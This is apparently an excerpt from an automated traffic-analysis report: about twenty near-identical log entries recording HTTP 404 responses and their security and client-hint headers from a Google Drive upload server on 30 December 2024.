                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4Srf_Q2hpDMVjhMHNZ7NiUZ7ea1BmLrOGs2ETZ-65vQWpBSCCjUfztih7qftgh-xtLContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:04 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-LLuk22OLalLYq8Tg5NWJRA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5hV00seUNW7uY2Qf80JzGEZE5mLuzSNd7kkVq7IdHAXy6PD60i6rX7Gx21f_s7KE8PContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:07 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-MfO68AmlM4GLNd2aDIokfg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7OfVRK4LViGeIc5zR_zfanSq4QGaRq0d_9JfFakGSLKCHpswpG_mzcLDjz4YFnrMlaContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:07 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-stzmDIQ-aJqV1_pgf4e1jw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC77XiNGQL5mU1n_yDU5PKf3ocdEhG5x6wIwF2Pq552Yb3bPEIxMEoA1pBNf4euERWklJQMm1soContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:08 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-o6LgOckbRqt7kI8VhRufAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6OI7jOjG9pqD-JB6VBKw-lNmfn-FpVLZ4D4i0AQUfHdPzms9Bmme_aISUQKU6yFXJcsnOjBRwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:08 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-cLeGq_b3dmlbSq3kkno-mg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7iwG5COxEj42xDB47WZi81Ns6vtoBxcgv3rrqX5cCYgTneMPmBKWEts5q9pq6LqvFOContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:09 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-ambaCKeutSA7W5Eg3OiHWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4l2CE9CZWmi10w3eXhiq3JmEpXk9Dh_RUlT7NT__k0_5KwHDmAThWoM-MVrt-KpUZ6lNr3y2IContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:09 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-w8JANNrhNJlabzhpiYjmvA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC50-n487laNT3KrdLTPIztcoLrostzIEegM5wPhWE19vQNvhxeqhtBeInlCNCbHZN1Tt6iTWZMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:11 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-L8JX47pLW7R0LtTrck0MJw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5_y5i5lPG1aOU0wiSsmWvShEiePlX4Wq_JkeuenR_XUQFF71Q7pFvhGwzlkALeXS4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:11 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-UPJnxdT4DZyMgBNz0GjmxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7Lh5v-0MuWHyOw_TefEFExUc9wNyGvQC_tHF4tjRjtxGO0ciRpHEcDOQi8AVu989rtContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:12 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-Qm8X_qKrbQqimXO87psscA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5BIpIiYpi5QrX3jGUgR4jCOoAxEfj-UQZ9xANAHuqSY9-gseZs6G-Pdnv2gM4xLaRdPYJqPLwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:13 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-6khM-vAXxF7JMFmMsc3LcA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4AMNqEWdpcKFzdvG6_ExacVC5RlClV7_m8P8ZlO3xFloZRAnAGBAKG-hImOce5U0fmContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:13 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'report-sample' 'nonce-M_mk_tAyYC1z88nVwQYKgQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6GMloOK8BdCokIcBrRHngZX_URa-SH1_eI2mhpjKiRngE0fR3YF-0RmVI_Ha2KjvdNmKqxYKAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:15 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-5UgY8RR8jVX-8Uq4IV1O8A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7iEh9I2GjWkEOztXkzkC3wOejI9a1hrVZGdvSiOtIrgoh1c_a5dCwoN5nqNFWIBn8MpDvsy0AContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:15 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-v3jSaI0PEqg8J-aeKWIxSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6Sh3xgX3PnWXIxgDXVZGPUTETmykNQonjEVaUITFD2Sgxy7xZztKc1SjQzvHL4wBcGContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:16 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-JZd43chUa4-61S2n-irduQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5d5hQrEWS9zgfZ4YwsGyZU1IPO-KAUM16kqCcIyKYsD0WO4ZwQxBgAFZmRvJlV-T2QbEvjtYcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:16 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-M3RW1lfUJdiT3RA1mDtDPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6PiOFyvkfDrMR0zebEZ6o06xcceZz9wmqMNHRYqjQihQDGOfyXekAmGXWekRLUDOF8w4F6j30Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:17 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'report-sample' 'nonce-zdJdon7oL7qixv9tP7fR1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7ccSWyK5kZhZiLVqwshWjRxPuGztISd5VZE3F8QuMGMUAIe2zj7tOXX0CSAHJB4J8xContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:17 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-x6obK0a2zEhnY0ZWoIuqXg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5drAjQQAOXjokjeDlJ1tWBWtbunS4sc6Cc9ieffBcKybId6H2nDXZiLVTE9BQm_9zlmSscZ7oContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:19 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-AgBI3Q2mwcnCxZjtf6aNYQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5hFky1yJTkzUWlYwycdSJ4q_AJOFStBp2NDlI1Afvj8tE_DM1oKs0REEmFW9fpQWrZContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:48:20 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Pvaf9J0qMGQ5ZqWdxqj4nQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
